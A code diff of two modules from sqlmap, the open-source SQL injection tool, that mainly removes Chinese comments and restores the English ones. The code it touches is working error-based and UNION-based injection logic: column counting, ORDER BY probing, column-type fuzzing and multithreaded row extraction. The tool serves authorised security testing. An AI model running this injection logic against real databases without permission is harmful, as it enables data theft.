                        if not kb.testMode:
                            check = r"(?P<result>[^<>\n]*?)%s" % kb.chars.stop[:2]
                            output = extractRegexResult(check, trimmed, re.IGNORECASE)
@ -211,105 +179,78 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
                            else:
                                output = output.rstrip()

-                # 处理不同数据库的结果拼接
                if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)):
                    if offset == 1:
-                        retVal = output  # 第一块直接赋值
+                        retVal = output
                    else:
-                        retVal += output if output else ''  # 后续块拼接
+                        retVal += output if output else ''

-                    # 判断是否需要继续获取下一块
                    if output and kb.errorChunkLength and len(output) >= kb.errorChunkLength and not chunkTest:
-                        offset += kb.errorChunkLength  # 增加偏移量
+                        offset += kb.errorChunkLength
                    else:
-                        break  # 获取完成
+                        break

-                    # 显示进度
                    if output and conf.verbose in (1, 2) and not any((conf.api, kb.bruteMode)):
-                        if kb.fileReadMode:  # 文件读取模式
+                        if kb.fileReadMode:
                            dataToStdout(_formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t"))
-                        elif offset > 1:  # 显示旋转进度条
+                        elif offset > 1:
                            rotator += 1
+
                            if rotator >= len(ROTATING_CHARS):
                                rotator = 0
+
                            dataToStdout("\r%s\r" % ROTATING_CHARS[rotator])
                else:
-                    retVal = output  # 其他数据库直接返回结果
+                    retVal = output
                    break
-
        except:
-            # 异常处理,保存部分结果
            if retVal is not None:
                hashDBWrite(expression, "%s%s" % (retVal, PARTIAL_VALUE_MARKER))
            raise

-        # 处理结果编码
-        retVal = decodeDbmsHexValue(retVal) if conf.hexConvert else retVal  # 十六进制解码
+        retVal = decodeDbmsHexValue(retVal) if conf.hexConvert else retVal

        if isinstance(retVal, six.string_types):
-            retVal = htmlUnescape(retVal).replace("<br>", "\n")  # HTML解码
+            retVal = htmlUnescape(retVal).replace("<br>", "\n")

-        retVal = _errorReplaceChars(retVal)  # 替换特殊字符
+        retVal = _errorReplaceChars(retVal)

-        # 缓存结果
        if retVal is not None:
            hashDBWrite(expression, retVal)

    else:
-        # 从缓存结果中提取数据
        _ = "(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
        retVal = extractRegexResult(_, retVal) or retVal

    return safecharencode(retVal) if kb.safeCharEncode else retVal

 def _errorFields(expression, expressionFields, expressionFieldsList, num=None, emptyFields=None, suppressOutput=False):
-    """
-    获取错误注入查询的字段值
-    
-    参数:
-    expression - SQL表达式
-    expressionFields - 表达式中的字段
-    expressionFieldsList - 字段列表
-    num - 行号(可选)
-    emptyFields - 空字段列表(可选)
-    suppressOutput - 是否抑制输出
-    
-    返回:
-    字段值列表
-    """
-    values = []  # 存储所有字段的值
-    origExpr = None  # 保存原始表达式
+    values = []
+    origExpr = None

-    width = getConsoleWidth()  # 获取控制台宽度
-    threadData = getCurrentThreadData()  # 获取当前线程数据
+    width = getConsoleWidth()
+    threadData = getCurrentThreadData()

-    # 遍历所有字段
    for field in expressionFieldsList:
        output = None

-        # 跳过ROWNUM字段
        if field.startswith("ROWNUM "):
            continue

-        # 处理行号限制
        if isinstance(num, int):
            origExpr = expression
            expression = agent.limitQuery(num, expression, field, expressionFieldsList[0])

-        # 替换表达式中的字段
        if "ROWNUM" in expressionFieldsList:
            expressionReplaced = expression
        else:
            expressionReplaced = expression.replace(expressionFields, field, 1)

-        # 执行查询获取字段值
        output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse(expressionReplaced, field)

-        # 检查线程是否需要继续
        if not kb.threadContinue:
            return None

-        # 输出结果
        if not any((suppressOutput, kb.bruteMode)):
            if kb.fileReadMode and output and output.strip():
                print()
@ -321,7 +262,6 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e

                dataToStdout("%s\n" % status)

-        # 恢复原始表达式
        if isinstance(num, int):
            expression = origExpr

@ -331,96 +271,72 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e

 def _errorReplaceChars(value):
    """
-    还原安全替换的字符
-    
-    参数:
-    value - 需要还原的字符串
-    
-    返回:
-    还原后的字符串
+    Restores safely replaced characters
    """
+
    retVal = value

    if value:
-        # 替换特殊字符
-        retVal = retVal.replace(kb.chars.space, " ")  # 空格
-        retVal = retVal.replace(kb.chars.dollar, "$")  # 美元符号
-        retVal = retVal.replace(kb.chars.at, "@")  # @符号
-        retVal = retVal.replace(kb.chars.hash_, "#")  # #符号
+        retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@").replace(kb.chars.hash_, "#")

    return retVal

 def _formatPartialContent(value):
    """
-    格式化部分内容用于安全的控制台输出
-    
-    参数:
-    value - 需要格式化的值
-    
-    返回:
-    格式化后的字符串
+    Prepares (possibly hex-encoded) partial content for safe console output
    """
+
    if value and isinstance(value, six.string_types):
        try:
-            value = decodeHex(value, binary=False)  # 尝试十六进制解码
+            value = decodeHex(value, binary=False)
        except:
            pass
        finally:
-            value = safecharencode(value)  # 安全编码
+            value = safecharencode(value)

    return value

 def errorUse(expression, dump=False):
    """
-    利用基于错误的SQL注入漏洞获取查询结果
-    这是主要的入口函数
-    
-    参数:
-    expression - SQL表达式
-    dump - 是否为转储模式
-    
-    返回:
-    查询结果
+    Retrieve the output of a SQL query taking advantage of the error-based
+    SQL injection vulnerability on the affected parameter.
    """
-    # 初始化注入技术
+
    initTechnique(getTechnique())

-    # 初始化变量
-    abortedFlag = False  # 中断标记
-    count = None  # 结果计数
-    emptyFields = []  # 空字段列表
-    start = time.time()  # 开始时间
-    startLimit = 0  # 起始限制
-    stopLimit = None  # 结束限制
-    value = None  # 结果值
+    abortedFlag = False
+    count = None
+    emptyFields = []
+    start = time.time()
+    startLimit = 0
+    stopLimit = None
+    value = None

-    # 获取表达式字段信息
    _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression)

-    # 设置部分运行标记(API模式)
+    # Set kb.partRun in case the engine is called from the API
    kb.partRun = getPartRun(alias=False) if conf.api else None

-    # 检查SQL查询是否可能返回多条记录
+    # We have to check if the SQL query might return multiple entries
+    # and in such case forge the SQL limiting the query output one
+    # entry at a time
+    # NOTE: we assume that only queries that get data from a table can
+    # return multiple entries
    if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) and not re.search(SQL_SCALAR_REGEX, expression, re.I):
-        # 添加限制条件
        expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump)

        if limitCond:
-            # 计算查询结果数量
+            # Count the number of SQL query entries output
            countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1)

-            # 移除ORDER BY子句(计数时不需要)
            if " ORDER BY " in countedExpression.upper():
                _ = countedExpression.upper().rindex(" ORDER BY ")
                countedExpression = countedExpression[:_]

-            # 获取计数结果
            _, _, _, _, _, _, countedExpressionFields, _ = agent.getFields(countedExpression)
            count = unArrayizeValue(_oneShotErrorUse(countedExpression, countedExpressionFields))

-            # 处理结果数量
            if isNumPosStrValue(count):
-                # 限制最大结果数
                if isinstance(stopLimit, int) and stopLimit > 0:
                    stopLimit = min(int(count), int(stopLimit))
                else:
@ -431,7 +347,6 @@ def errorUse(expression, dump=False):
                    logger.debug(debugMsg)

            elif count and not count.isdigit():
-                # 无法计数时假设只有一条结果
                warnMsg = "it was not possible to count the number "
                warnMsg += "of entries for the SQL query provided. "
                warnMsg += "sqlmap will assume that it returns only "
@ -441,18 +356,15 @@ def errorUse(expression, dump=False):
                stopLimit = 1

            elif not isNumPosStrValue(count):
-                # 处理空结果
                if not count:
                    warnMsg = "the SQL query provided does not "
                    warnMsg += "return any output"
                    logger.warning(warnMsg)
                else:
-                    value = []  # 空表
+                    value = []  # for empty tables
                return value

-            # 多线程处理多条记录
            if isNumPosStrValue(count) and int(count) > 1:
-                # 询问是否移除ORDER BY以提高速度
                if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD:
                    message = "due to huge table size do you want to remove "
                    message += "ORDER BY clause gaining speed over consistency? [y/N] "
@ -460,30 +372,26 @@ def errorUse(expression, dump=False):
                    if readInput(message, default='N', boolean=True):
                        expression = expression[:expression.index(" ORDER BY ")]

-                # 设置线程数
                numThreads = min(conf.threads, (stopLimit - startLimit))

                threadData = getCurrentThreadData()

                try:
-                    # 创建结果范围迭代器
                    threadData.shared.limits = iter(xrange(startLimit, stopLimit))
                except OverflowError:
                    errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
                    errMsg += "with switch '--fresh-queries'"
                    raise SqlmapDataException(errMsg)

-                # 初始化共享数据
-                threadData.shared.value = BigArray()  # 存储结果
-                threadData.shared.buffered = []  # 缓冲区
-                threadData.shared.counter = 0  # 计数器
-                threadData.shared.lastFlushed = startLimit - 1  # 最后刷新位置
-                threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1  # 是否显示进度
+                threadData.shared.value = BigArray()
+                threadData.shared.buffered = []
+                threadData.shared.counter = 0
+                threadData.shared.lastFlushed = startLimit - 1
+                threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1

                if threadData.shared.showEta:
                    threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))

-                # 检查空列
                if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD):
                    for field in expressionFieldsList:
                        if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0':
@ -492,23 +400,17 @@ def errorUse(expression, dump=False):
                            debugMsg += "dumped as it appears to be empty"
                            logger.debug(debugMsg)

-                # 对大量数据禁用恢复信息显示
                if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
                    kb.suppressResumeInfo = True
                    debugMsg = "suppressing possible resume console info because of "
                    debugMsg += "large number of rows. It might take too long"
                    logger.debug(debugMsg)

-                # 执行多线程查询
                try:
                    def errorThread():
-                        """
-                        错误注入查询线程函数
-                        """
                        threadData = getCurrentThreadData()

                        while kb.threadContinue:
-                            # 获取下一个查询范围
                            with kb.locks.limit:
                                try:
                                    threadData.shared.counter += 1
@ -516,63 +418,51 @@ def errorUse(expression, dump=False):
                                except StopIteration:
                                    break

-                            # 执行查询
                            output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta)

                            if not kb.threadContinue:
                                break

-                            # 处理单值结果
                            if output and isListLike(output) and len(output) == 1:
                                output = unArrayizeValue(output)

-                            # 保存结果
                            with kb.locks.value:
                                index = None
                                if threadData.shared.showEta:
                                    threadData.shared.progress.progress(threadData.shared.counter)
-                                # 按顺序插入结果
                                for index in xrange(1 + len(threadData.shared.buffered)):
                                    if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
                                        break
                                threadData.shared.buffered.insert(index or 0, (num, output))
-                                # 刷新连续的结果
                                while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]:
                                    threadData.shared.lastFlushed += 1
                                    threadData.shared.value.append(threadData.shared.buffered[0][1])
                                    del threadData.shared.buffered[0]

-                    # 运行多线程
                    runThreads(numThreads, errorThread)

                except KeyboardInterrupt:
-                    # 处理用户中断
                    abortedFlag = True
                    warnMsg = "user aborted during enumeration. sqlmap "
                    warnMsg += "will display partial output"
                    logger.warning(warnMsg)

                finally:
-                    # 保存剩余结果
                    threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered))
                    value = threadData.shared.value
                    kb.suppressResumeInfo = False

-    # 单条记录查询
    if not value and not abortedFlag:
        value = _errorFields(expression, expressionFields, expressionFieldsList)

-    # 处理返回结果格式
    if value and isListLike(value):
        if len(value) == 1 and isinstance(value[0], (six.string_types, type(None))):
-            value = unArrayizeValue(value)  # 单值结果
+            value = unArrayizeValue(value)
        elif len(value) > 1 and stopLimit == 1:
-            value = [value]  # 多值结果
+            value = [value]

-    # 计算执行时间
    duration = calculateDeltaSeconds(start)

-    # 输出调试信息
    if not kb.bruteMode:
        debugMsg = "performed %d quer%s in %.2f seconds" % (kb.counters[getTechnique()], 'y' if kb.counters[getTechnique()] == 1 else "ies", duration)
        logger.debug(debugMsg)
--- a/src/sqlmap-master/lib/techniques/union/test.py
+++ b/src/sqlmap-master/lib/techniques/union/test.py
@ -5,96 +5,68 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入所需的Python标准库和自定义模块
-import itertools  # 用于创建迭代器
-import logging  # 用于日志记录
-import random  # 用于生成随机数
-import re  # 用于正则表达式操作
-
-# 导入自定义的工具函数和类
-from lib.core.agent import agent  # SQL注入代理模块
-from lib.core.common import average  # 计算平均值
-from lib.core.common import Backend  # 数据库后端
-from lib.core.common import getPublicTypeMembers  # 获取公共类型成员
-from lib.core.common import isNullValue  # 判断是否为空值
-from lib.core.common import listToStrValue  # 列表转字符串
-from lib.core.common import popValue  # 弹出值
-from lib.core.common import pushValue  # 压入值
-from lib.core.common import randomInt  # 生成随机整数
-from lib.core.common import randomStr  # 生成随机字符串
-from lib.core.common import readInput  # 读取用户输入
-from lib.core.common import removeReflectiveValues  # 移除反射值
-from lib.core.common import setTechnique  # 设置注入技术
-from lib.core.common import singleTimeLogMessage  # 单次日志消息
-from lib.core.common import singleTimeWarnMessage  # 单次警告消息
-from lib.core.common import stdev  # 计算标准差
-from lib.core.common import wasLastResponseDBMSError  # 检查上次响应是否为数据库错误
-from lib.core.compat import xrange  # 兼容Python2/3的range函数
-from lib.core.data import conf  # 配置数据
-from lib.core.data import kb  # 知识库数据
-from lib.core.data import logger  # 日志记录器
-from lib.core.data import queries  # SQL查询语句
-from lib.core.decorators import stackedmethod  # 堆栈方法装饰器
-from lib.core.dicts import FROM_DUMMY_TABLE  # 虚拟表字典
-from lib.core.enums import FUZZ_UNION_COLUMN  # UNION列模糊测试枚举
-from lib.core.enums import PAYLOAD  # 载荷类型枚举
-from lib.core.settings import FUZZ_UNION_ERROR_REGEX  # UNION错误正则表达式
-from lib.core.settings import FUZZ_UNION_MAX_COLUMNS  # UNION最大列数
-from lib.core.settings import LIMITED_ROWS_TEST_NUMBER  # 有限行测试数
-from lib.core.settings import MAX_RATIO  # 最大比率
-from lib.core.settings import MIN_RATIO  # 最小比率
-from lib.core.settings import MIN_STATISTICAL_RANGE  # 最小统计范围
-from lib.core.settings import MIN_UNION_RESPONSES  # 最小UNION响应数
-from lib.core.settings import NULL  # NULL值常量
-from lib.core.settings import ORDER_BY_MAX  # ORDER BY最大值
-from lib.core.settings import ORDER_BY_STEP  # ORDER BY步长
-from lib.core.settings import UNION_MIN_RESPONSE_CHARS  # UNION最小响应字符数
-from lib.core.settings import UNION_STDEV_COEFF  # UNION标准差系数
-from lib.core.unescaper import unescaper  # SQL转义处理器
-from lib.request.comparison import comparison  # 响应比较
-from lib.request.connect import Connect as Request  # HTTP请求处理
+import itertools
+import logging
+import random
+import re
+
+from lib.core.agent import agent
+from lib.core.common import average
+from lib.core.common import Backend
+from lib.core.common import getPublicTypeMembers
+from lib.core.common import isNullValue
+from lib.core.common import listToStrValue
+from lib.core.common import popValue
+from lib.core.common import pushValue
+from lib.core.common import randomInt
+from lib.core.common import randomStr
+from lib.core.common import readInput
+from lib.core.common import removeReflectiveValues
+from lib.core.common import setTechnique
+from lib.core.common import singleTimeLogMessage
+from lib.core.common import singleTimeWarnMessage
+from lib.core.common import stdev
+from lib.core.common import wasLastResponseDBMSError
+from lib.core.compat import xrange
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.data import queries
+from lib.core.decorators import stackedmethod
+from lib.core.dicts import FROM_DUMMY_TABLE
+from lib.core.enums import FUZZ_UNION_COLUMN
+from lib.core.enums import PAYLOAD
+from lib.core.settings import FUZZ_UNION_ERROR_REGEX
+from lib.core.settings import FUZZ_UNION_MAX_COLUMNS
+from lib.core.settings import LIMITED_ROWS_TEST_NUMBER
+from lib.core.settings import MAX_RATIO
+from lib.core.settings import MIN_RATIO
+from lib.core.settings import MIN_STATISTICAL_RANGE
+from lib.core.settings import MIN_UNION_RESPONSES
+from lib.core.settings import NULL
+from lib.core.settings import ORDER_BY_MAX
+from lib.core.settings import ORDER_BY_STEP
+from lib.core.settings import UNION_MIN_RESPONSE_CHARS
+from lib.core.settings import UNION_STDEV_COEFF
+from lib.core.unescaper import unescaper
+from lib.request.comparison import comparison
+from lib.request.connect import Connect as Request

 def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=PAYLOAD.WHERE.ORIGINAL):
    """
-    查找UNION注入所影响的列数
-    
-    参数:
-    comment - SQL注释
-    place - 注入点位置
-    parameter - 注入参数
-    value - 参数值
-    prefix - SQL前缀
-    suffix - SQL后缀
-    where - 注入位置(默认为原始位置)
-    
-    返回:
-    找到的列数,如果未找到则返回None
+    Finds number of columns affected by UNION based injection
    """
    retVal = None

    @stackedmethod
    def _orderByTechnique(lowerCount=None, upperCount=None):
-        """
-        使用ORDER BY技术来确定列数
-        
-        参数:
-        lowerCount - 最小列数
-        upperCount - 最大列数
-        
-        返回:
-        找到的列数
-        """
        def _orderByTest(cols):
-            """
-            测试指定列数的ORDER BY语句是否有效
-            """
            query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix)
            query = agent.suffixQuery(query, suffix=suffix, comment=comment)
            payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where)
            page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)
            return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order (by|clause)", "unknown column", "failed")) and not kb.heavilyDynamic and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None

-        # 如果ORDER BY 1成功但ORDER BY随机大数失败,说明ORDER BY技术可用
        if _orderByTest(1 if lowerCount is None else lowerCount) and not _orderByTest(randomInt() if upperCount is None else upperCount + 1):
            infoMsg = "'ORDER BY' technique appears to be usable. "
            infoMsg += "This should reduce the time needed "
@ -103,7 +75,6 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
            infoMsg += "range for current UNION query injection technique test"
            singleTimeLogMessage(infoMsg)

-            # 二分查找确定准确的列数
            lowCols, highCols = 1 if lowerCount is None else lowerCount, ORDER_BY_STEP if upperCount is None else upperCount
            found = None
            while not found:
@ -126,14 +97,12 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
            return found

    try:
-        # 保存当前错误状态
        pushValue(kb.errorIsNone)
        items, ratios = [], []
        kb.errorIsNone = False
        lowerCount, upperCount = conf.uColsStart, conf.uColsStop

-        # 如果ORDER BY列数未知且起始列为1或指定了列数,尝试使用ORDER BY技术
-        if kb.orderByColumns is None and (lowerCount == 1 or conf.uCols):
+        if kb.orderByColumns is None and (lowerCount == 1 or conf.uCols):  # Note: ORDER BY is not bullet-proof
            found = _orderByTechnique(lowerCount, upperCount) if conf.uCols else _orderByTechnique()

            if found:
@ -144,14 +113,12 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
            elif kb.futileUnion:
                return None

-        # 确保测试范围足够大
        if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES:
            upperCount = lowerCount + MIN_UNION_RESPONSES

        min_, max_ = MAX_RATIO, MIN_RATIO
        pages = {}

-        # 对每个可能的列数进行测试
        for count in xrange(lowerCount, upperCount + 1):
            query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
            payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
@ -160,13 +127,11 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
            if not isNullValue(kb.uChar):
                pages[count] = page

-            # 计算响应相似度
            ratio = comparison(page, headers, code, getRatioValue=True) or MIN_RATIO
            ratios.append(ratio)
            min_, max_ = min(min_, ratio), max(max_, ratio)
            items.append((count, ratio))

-        # 如果使用了特定字符进行UNION注入测试
        if not isNullValue(kb.uChar):
            value = re.escape(kb.uChar.strip("'"))
            for regex in (value, r'>\s*%s\s*<' % value):
@ -175,7 +140,6 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
                    retVal = contains[0]
                    break

-        # 如果没有找到明确的列数,使用统计分析方法
        if not retVal:
            if min_ in ratios:
                ratios.pop(ratios.index(min_))
@ -190,7 +154,6 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
                elif item[1] == max_:
                    maxItem = item

-            # 根据响应相似度的分布确定列数
            if all(_ == min_ and _ != max_ for _ in ratios):
                retVal = maxItem[0]

@ -212,7 +175,6 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
    finally:
        kb.errorIsNone = popValue()

-    # 如果找到了列数,输出信息
    if retVal:
        infoMsg = "target URL appears to be UNION injectable with %d columns" % retVal
        singleTimeLogMessage(infoMsg, logging.INFO, re.sub(r"\d+", 'N', infoMsg))
@ -220,29 +182,14 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
    return retVal

 def _fuzzUnionCols(place, parameter, prefix, suffix):
-    """
-    模糊测试UNION查询的列类型
-    
-    参数:
-    place - 注入点位置
-    parameter - 注入参数
-    prefix - SQL前缀
-    suffix - SQL后缀
-    
-    返回:
-    成功时返回列类型模板,失败返回None
-    """
    retVal = None

-    # 如果已识别数据库类型且页面模板中没有UNION错误,且知道ORDER BY列数
    if Backend.getIdentifiedDbms() and not re.search(FUZZ_UNION_ERROR_REGEX, kb.pageTemplate or "") and kb.orderByColumns:
        comment = queries[Backend.getIdentifiedDbms()].comment.query

-        # 获取所有可能的列类型组合
        choices = getPublicTypeMembers(FUZZ_UNION_COLUMN, True)
        random.shuffle(choices)

-        # 测试每种列类型组合
        for candidate in itertools.product(choices, repeat=kb.orderByColumns):
            if retVal:
                break
@ -251,13 +198,11 @@ def _fuzzUnionCols(place, parameter, prefix, suffix):
            else:
                candidate = [_.replace(FUZZ_UNION_COLUMN.INTEGER, str(randomInt())).replace(FUZZ_UNION_COLUMN.STRING, "'%s'" % randomStr(20)) for _ in candidate]

-            # 构造并测试UNION查询
            query = agent.prefixQuery("UNION ALL SELECT %s%s" % (','.join(candidate), FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), "")), prefix=prefix)
            query = agent.suffixQuery(query, suffix=suffix, comment=comment)
            payload = agent.payload(newValue=query, place=place, parameter=parameter, where=PAYLOAD.WHERE.NEGATIVE)
            page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)

-            # 如果没有UNION错误,检查字符串列是否在响应中
            if not re.search(FUZZ_UNION_ERROR_REGEX, page or ""):
                for column in candidate:
                    if column.startswith("'") and column.strip("'") in (page or ""):
@ -267,82 +212,66 @@ def _fuzzUnionCols(place, parameter, prefix, suffix):
    return retVal

 def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL):
-    """
-    确定UNION注入的有效列位置
-    
-    参数:
-    comment - SQL注释
-    place - 注入点位置
-    parameter - 注入参数
-    prefix - SQL前缀
-    suffix - SQL后缀
-    count - 列数
-    where - 注入位置
-    
-    返回:
-    (有效载荷, 注入向量)元组
-    """
    validPayload = None
    vector = None

-    # 生成所有可能的列位置
    positions = [_ for _ in xrange(0, count)]

-    # 随机打乱位置顺序,以避免偏差
+    # Unbiased approach for searching appropriate usable column
    random.shuffle(positions)

-    # 使用两种不同长度的随机字符串进行测试
    for charCount in (UNION_MIN_RESPONSE_CHARS << 2, UNION_MIN_RESPONSE_CHARS):
        if vector:
            break

-        # 测试每个列位置
+        # For each column of the table (# of NULL) perform a request using
+        # the UNION ALL SELECT statement to test it the target URL is
+        # affected by an exploitable union SQL injection vulnerability
        for position in positions:
-            # 准备带分隔符的测试字符串
+            # Prepare expression with delimiters
            randQuery = randomStr(charCount)
            phrase = ("%s%s%s" % (kb.chars.start, randQuery, kb.chars.stop)).lower()
            randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
            randQueryUnescaped = unescaper.escape(randQueryProcessed)

-            # 构造UNION注入查询
+            # Forge the union SQL injection request
            query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where)
            payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)

-            # 发送请求并检查响应
+            # Perform the request
            page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
            content = ("%s%s" % (removeReflectiveValues(page, payload) or "", removeReflectiveValues(listToStrValue(headers.headers if headers else None), payload, True) or "")).lower()

-            # 如果测试字符串在响应中,说明找到了可用的列位置
            if content and phrase in content:
                validPayload = payload
                kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1
                vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, conf.forcePartial, kb.tableFrom, kb.unionTemplate)

-                # 如果是在原始位置测试,进行额外确认
                if where == PAYLOAD.WHERE.ORIGINAL:
-                    # 准备第二个测试字符串
+                    # Prepare expression with delimiters
                    randQuery2 = randomStr(charCount)
                    phrase2 = ("%s%s%s" % (kb.chars.start, randQuery2, kb.chars.stop)).lower()
                    randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
                    randQueryUnescaped2 = unescaper.escape(randQueryProcessed2)

-                    # 使用多个UNION测试完整性
+                    # Confirm that it is a full union SQL injection
                    query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2)
                    payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)

+                    # Perform the request
                    page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
                    content = ("%s%s" % (page or "", listToStrValue(headers.headers if headers else None) or "")).lower()

-                    # 如果两个测试字符串都不在响应中,切换到部分模式
                    if not all(_ in content for _ in (phrase, phrase2)):
                        vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True, kb.tableFrom, kb.unionTemplate)
                    elif not kb.unionDuplicates:
-                        # 测试行数限制
                        fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr())

+                        # Check for limited row output
                        query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable)
                        payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)

+                        # Perform the request
                        page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
                        content = ("%s%s" % (removeReflectiveValues(page, payload) or "", removeReflectiveValues(listToStrValue(headers.headers if headers else None), payload, True) or "")).lower()
                        if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER:
@ -350,7 +279,6 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
                            logger.warning(warnMsg)
                            vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True, kb.tableFrom, kb.unionTemplate)

-                # 检查是否是UNION/错误混合注入情况
                unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError()

                if unionErrorCase and count > 1:
@ -364,27 +292,15 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
    return validPayload, vector

 def _unionConfirm(comment, place, parameter, prefix, suffix, count):
-    """
-    确认UNION SQL注入并获取精确的列位置
-    
-    参数:
-    comment - SQL注释
-    place - 注入点位置
-    parameter - 注入参数
-    prefix - SQL前缀
-    suffix - SQL后缀
-    count - 列数
-    
-    返回:
-    (有效载荷, 注入向量)元组
-    """
    validPayload = None
    vector = None

-    # 在原始位置确认UNION注入
+    # Confirm the union SQL injection and get the exact column
+    # position which can be used to extract data
    validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count)

-    # 如果原始位置未找到,尝试在否定位置确认
+    # Assure that the above function found the exploitable full union
+    # SQL injection position
    if not validPayload:
        validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE)

@ -392,19 +308,9 @@ def _unionConfirm(comment, place, parameter, prefix, suffix, count):

 def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix):
    """
-    通过字符暴力测试目标URL是否存在UNION SQL注入漏洞
-    测试最多进行50列
-    
-    参数:
-    comment - SQL注释
-    place - 注入点位置
-    parameter - 注入参数
-    value - 参数值
-    prefix - SQL前缀
-    suffix - SQL后缀
-    
-    返回:
-    (有效载荷, 注入向量)元组
+    This method tests if the target URL is affected by an union
+    SQL injection vulnerability. The test is done up to 50 columns
+    on the target database table
    """

    validPayload = None
@ -413,7 +319,7 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
    uChars = (conf.uChar, kb.uChar)
    where = PAYLOAD.WHERE.ORIGINAL if isNullValue(kb.uChar) else PAYLOAD.WHERE.NEGATIVE

-    # 如果用户明确指定了列数
+    # In case that user explicitly stated number of columns affected
    if conf.uColsStop == conf.uColsStart:
        count = conf.uColsStart
    else:
@ -422,7 +328,6 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
    if count:
        validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count)

-        # 如果未找到有效载荷且未设置某些配置,尝试模糊测试
